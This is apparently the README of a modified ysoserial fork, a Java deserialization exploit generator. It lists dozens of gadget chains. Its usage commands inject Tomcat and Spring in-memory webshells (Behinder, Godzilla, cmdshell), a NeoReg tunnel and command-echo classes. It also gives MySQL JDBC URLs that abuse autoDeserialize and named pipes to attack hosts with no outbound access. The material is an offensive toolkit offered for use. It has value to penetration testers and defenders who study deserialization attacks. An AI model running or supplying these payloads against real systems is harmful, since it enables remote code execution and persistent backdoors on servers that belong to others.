ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。
加入生成mysql的pipe恶意流文件功能,java-chains下版本更新。
java -jar ysoserial_mysqlpipe-0.0.6-SNAPSHOT-all.jar
Y SO SERIAL_mysqlpipe ?
Usage: java -jar ysoserial_mysqlpipe-[version]-all.jar [mode] [payload] '[command]'
[mode]: [gadget]/[mysqlpipe]_[version]_(user)
提供mysql的pipe恶意流文件,上传服务器,进行不出网利用,数据库为test,用户名默认mysql,可自己设置。
mysql5: jdbc:mysql://xxx/test?useSSL=false&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=mysql&socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&namedPipePath=output.pcap
msysql6: jdbc:mysql://xxx/test?useSSL=false&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=mysql&socketFactory=com.mysql.cj.core.io.NamedPipeSocketFactory&namedPipePath=output.pcap
mysql8: jdbc:mysql://xxx/test?&maxAllowedPacket=74996390&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=mysql&socketFactory=com.mysql.cj.protocol.NamedPipeSocketFactory&namedPipePath=output.pcap
Available payload types:
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Ceylon @kai_ullrich ceylon.language:1.3.3
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsBeanutils183NOCC @Y4er commons-beanutils:1.8.3
CommonsBeanutils192NOCC @Y4er commons-beanutils:1.9.2
CommonsBeanutils192WithDualTreeBidiMap @Y4er commons-beanutils:1.9.2, commons-collections:3.1
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections12 @Y4er commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
CommonsCollections8 @navalorenzo commons-collections4:4.0
Fastjson1 @Y4er fastjson:1.2.83
Fastjson2 @Y4er fastjson:2.x
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
Jackson1 @Y4er jackson-databind:2.14.2
Jackson2 @Y4er jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
Jython2 @steven_seeley, @rocco_calvi jython-standalone:2.7.3
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4以CommonsBeanutils192NOCC为例:
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" # TomcatCmdEcho
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromJMX" # TomcatServletMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromThread" # TomcatServletMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromJMX" # TomcatFilterMemShellFromJMX 适用于tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromThread" # TomcatFilterMemShellFromThread 适用于tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromJMX" # TomcatListenerMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromThread" # TomcatListenerMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerNeoRegFromThread" # TomcatListenerNeoRegFromThread python neoreg.py -k fuckyou
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:SpringInterceptorMemShell" # SpringInterceptorMemShell 链接shell需要使用存在的路由
java -jar ysoserial.jar CommonsBeanutils192NOCC "FILE:E:\Calc.class" # ClassLoaderTemplate
java -jar ysoserial.jar CommonsBeanutils192NOCC "calc" # CommandTemplate CLASS: FILE: 不使用协议开头则默认为执行cmd一键注入cmdshell、冰蝎、哥斯拉内存马,shell连接使用请查看指定类。解决了request和response包装类导致冰蝎链接失败的问题,见issue。
以下受到Gadgets.createTemplatesImpl影响的gadget均需要如上方式传递参数:
- Click1
- CommonsBeanutils1
- CommonsBeanutils183NOCC
- CommonsBeanutils192NOCC
- CommonsCollections2
- CommonsCollections3
- CommonsCollections4
- Hibernate1
- JavassistWeld1
- JBossInterceptors1
- Jdk7u21
- JSON1
- MozillaRhino1
- MozillaRhino2
- ROME
- Spring1
- Spring2
- Vaadin1
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
- Fork it
- Create your feature branch (
git checkout -b my-new-feature) - Commit your changes (
git commit -am 'Add some feature') - Push to the branch (
git push origin my-new-feature) - Create new Pull Request